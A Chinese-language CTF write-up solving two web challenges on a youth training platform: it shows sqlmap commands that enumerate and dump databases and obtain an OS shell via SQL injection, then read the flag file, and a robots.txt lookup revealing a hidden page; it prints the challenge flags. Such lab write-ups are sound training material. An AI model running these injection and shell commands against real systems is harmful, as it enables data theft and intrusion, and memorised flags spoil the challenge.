青少年CTF训练平台-web部分随笔
文章管理系统
首先打开环境(>ω<。人)ZZz♪♪
既然要做题,就要做全面了,图上说了,既然有假flag我就先找出来:
假flag:
打开vmware,使用sqlmap进行处理:
sqlmap -u http://challenge.qsnctf.com:31645/?id=1 --dbs记得中间的url换成自己的
看到了五个可能:
{*] ctftraining
[*] information_schema
[*] mysql
[*] performance_schema
[*] test
[*] word
那就挨个读取,利用指令
sqlmap -u http://challenge.qsnctf.com:31645/?id=1 -D ctftraining -T test --dump”ctftraining“改为上述文件夹进行尝试最终得到
好的,得到了假flag了♪(⌒∇⌒)ノ""
真flag:
同样打开kali,对sqlmap进行修改代码
sqlmap -u "http://challenge.qsnctf.com:32030/?id=1" --os-shell进行执行:
进行寻找:
查找一下flag:
find / -name "flag"
看到了,调取:
cat /flag
OK,拿到了 (*˘︶˘*).。.:*♡
qsnctf{5a73aa45b44b409a815a4051428a3e11}Robots
打开题目环境:
既然提示了Robots.txt那就访问一下呗:
http://challenge.qsnctf.com:32422/robots.txt看到了有个什么什么的.php
http://challenge.qsnctf.com:32422/f1ag_1n_the_h3re.php
得到flag:
qsnctf{ed8c1a488b4e4304b89c01531d41b99c}